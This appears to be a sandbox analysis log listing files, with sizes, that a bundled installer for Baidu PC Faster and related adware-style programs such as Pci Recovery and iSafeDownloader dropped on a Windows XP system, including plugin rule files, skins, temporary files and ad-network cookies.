%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1140.BroderbundBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\PcfTray\PcfTray.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1070.IMVUToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\dynamic\PluginHome\rocket.bskin (13368 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\SysOpt\optrec.5.1.def.db (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Antivirus\Plugin_Antivirus.dll (25776 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\update\update.bskin (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\ieprotect\ieprotect.bskin (13 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\uTorrentBar.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\sound\startup.wav (5520 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1121.KeyBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Palm_on.png (477 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1185.InstantSavingsApp.rul (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BETManger.dll (21216 bytes)
%Documents and Settings%\All Users\Application Data\Duplicaterecord.js (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Uninstall.exe (16944 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1061.SearchProtect.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\PluginConfig.xml (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\StartNow.rul (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\NewFeatures.txt (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1082.PricePeep.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1072.MyHomepage.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\screensnpashot\screensnpashot.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1165.SavingsScout.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\StartNow.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\BlackBerry_on.png (426 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\PcfTray\PcfTray.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_junkclean\skin_junkclean.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1104.SavepathDeals.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\data\rl.dat (789 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1180.TNT2-ide.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1088.yontooToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\IWantThis.rul (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\6.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\data\LinkCensor.dat (104 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1169.LoadTubes.rul (812 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\common\common.bskin (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\log2.dll (12088 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\BBK_on.png (506 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BEVMEngine.dll (25776 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Philips_on.png (449 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\WebClient.dll (12536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\11351.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\BrowserDefender.rul.bak (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\dynamic\data.bns (514 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\uTorrentControl.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10129.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1051.SavingsApp.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\85Play_Games.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1158.UnfriendCheck.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\dynamic\ResultRecommend\config.txt (23 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\sysconfig.ini (473 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Google_on.png (691 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\webcake.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Xiaomi_off.png (385 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\PluginOptimizer\img_circle.png (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\LogReporter.exe (23424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\BHips.dll (22192 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\snow.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\searchya.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1144.WiseConvertB2.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\connect_circle.png (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1086.DownloadEnergyToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0006.UpdateChecker.rul (671 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0008.UnderTheSea.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0011.CdCoverCreator.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1139.RecipesBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1128.EasyTVBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\ieprotect\ieprotect.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1053.SupremeSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\15.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1189.JollyWallet.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10092.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0024.VideoDownloadConvert.rul (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\popups\popups.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\update\update.bskin (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\HipsHB.dll (16288 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\lang.ini (162 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1183.SuperfishWindowShopper.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BdApiUtil.dll (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10495.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1175.SySaver.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1077.BrowserCompanion.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Samsung_off.png (597 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1134.ooVoo.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1142.KeyBar1.13.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1046.appbario12.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1050.SolidSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\lightning.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\5.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Motorola_off.png (541 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1051.SavingsApp.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PopupTip.exe (11344 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1064.Webblog.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Aflamster.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\SearchAmong.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\CouponCompanion.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1060.LuckySavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFTray.exe (39329 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1125.NCH_ENToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1162.TidyNetwork.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\hipspop\hipspop.bskin (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1196.V9Toolbar.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0004.iLivid.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1161.Linksicle.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1136.AF_HSS.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1067.SearchAssistant.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1146.BrotherSoftExtremeToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\cloudy.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1183.SuperfishWindowShopper.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\TCL_off.png (454 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1050.SolidSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\PcfTray\PcfTray.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0022.AnimatorDV.rul (352 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\DeepOptimization.exe (60186 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_crashreporter\skin_crashreporter.bskin (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\data\sbr2.dat (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1132.SerifBar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\IEProtect.exe (26688 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1138.MapsBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\ieprotect_font\ieprotect_font.bskin (488 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\oovoo.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\BugReporter\BugReporter.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1185.InstantSavingsApp.rul (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\tools\BigFileCleaner\BigFileCleaner.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\DafaultPC_on.png (380 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Xiaomi_on.png (399 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\littleboy.png (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1074.CodecPerformer.rul (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\sysconfig.ini (473 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1110.BrowseForTheCause.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\common\common.bskin (367 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0018.AbsoluteShieldfileshredder.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Dealio.rul.bak (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1169.LoadTubes.rul (812 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1179.FilesFrogUpdateChecker.rul (765 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10684.png (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\nsis_install\nsis_install.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Inbox.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\HTC_off.png (481 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\tools\BigFileCleaner\BigFileCleaner.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\popups\popups.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1113.SpyGuard.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\NewFeatures\NewFeatures.bskin (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\InstallUtility.dll (35001 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\hipspop\hipspop.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\hipspop\hipspop.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\hipspop\hipspop.bskin (784 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Baidu PC Faster\Feedback.lnk (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1150.DealSlider.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1076.SavingsAddon.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10021.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1197.Desk365.rul (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\546bc63d69dc67b163bfc222c0f38be6.gnet.tmp (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCFMiniService\MiniService.exe (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\config.xml_.tmp (344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-16-0154-[7431].tmp (1034 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-51-0529-[7545].tmp (1395 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCFMiniService\MiniServicePlugIn.dll (1608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81e529e3201a4f47a9fb16e1d81dcc1e.gnet.tmp (3008 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Baidu_Secure_SystemUp_5.0.4.87531.exe (138231 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-32-51-0904-[7349].tmp (1704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\test4822FBB5_0309_420f_9DA2_FA5B8B854946\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pcfB6.tmp (21 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-32-59-0013-[7375].tmp (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\urlB8.tmp (196 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\RpData\rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-16-0170-[7431].tmp (770 bytes)
%Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)
%WinDir%\Tasks\Baidu PC Faster Update.job (412 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (484 bytes)
C:\$Directory (484 bytes)
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Perflib_Perfdata_80.dat (100 bytes)
%WinDir%\Temp\Perflib_Perfdata_428.dat (100 bytes)
%WinDir%\Temp\Perflib_Perfdata_7ac.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (4 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@smarttrk[1].txt (478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\p[1].xml (97 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\statistic[1].htm (435 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@smarttrk[2].txt (494 bytes)
%Program Files%\Pci Recovery\Uninstall\uniB9.tmp (9317 bytes)
%Program Files%\Pci Recovery\Uninstall\uninstall.dat (2104 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.pcfaster[1].txt (136 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@network.adsmarket[2].txt (500 bytes)
%Program Files%\Pci Recovery\Uninstall\IRIMG1.JPG (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@network.adsmarket[1].txt (245 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sprintrade[1].txt (6010 bytes)
%Program Files%\Pci Recovery\lua5.1.dll (2902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\PC_Faster_Setup_Mini_B104_144327560.exe (1065719 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sprintrade[2].txt (7049 bytes)
%Program Files%\Pci Recovery\uninstall.exe (9213 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Pci Recovery Setup Log.txt (2260 bytes)
%Program Files%\Pci Recovery\Uninstall\IRIMG2.JPG (29 bytes)
%Program Files%\Pci Recovery\Uninstall\uninstall.xml (3475 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yet_another_cleaner_mat.exe (381505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~dlBD.tmp.bk (524749 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\vmwarexvirtualxidexhardxdrive_00000000000000000001[1].htm (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vmwarexvirtualxidexhardxdrive_00000000000000000001[1].htm (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\vmwarexvirtualxidexhardxdrive_00000000000000000001[1].htm (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\vmwarexvirtualxidexhardxdrive_00000000000000000001[1].htm (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\vmwarexvirtualxidexhardxdrive_00000000000000000001[2].htm (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yac[1].exe (3782807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\vmwarexvirtualxidexhardxdrive_00000000000000000001[2].htm (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\vmwarexvirtualxidexhardxdrive_00000000000000000001[2].htm (72 bytes)
%Documents and Settings%\%current user%\Application Data\eCyber\log\isafedownloader.log (1004 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_tip_icon.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_btn_bk.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\msgbox_btn_bk.png (979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\check_indeterminate.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\iSafeDownloader.exe (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\dl_inst_clean_icon.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\pvb_skin.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\popup_bk.png (167 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\toggle_btn_pop_bk.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\msgbox_close_btn.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\msgbox_bk_eu.png (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_prog_meter.png (133 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\if_warning.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\progressbar_anim.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\lang\dl_install_lang.xml (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\if_question.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\style\common_style.xml (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\layout\msgbox.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_res.xml (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\check_checked.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyBB.tmp\elexInsert.dll (3508 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\soft_remove_button_bk.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\open_dir.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\check_checked.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\dl_inst_protect_icon.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\min_btn_bk.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\check_uncheck.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\resource.xml (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scan_check.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\close_btn_bk.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\uninstall_bg.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_bk.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_prog_bk.png (151 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\progressbar_image.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\custom_uncheck.png (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\complete_button_bk.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\switch_button_on.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\dl_inst_optimize_icon.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scan_warning.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\custom_check.png (460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\style\style.xml (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\combo_list.png (615 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\msgbox_bk.png (4 bytes)
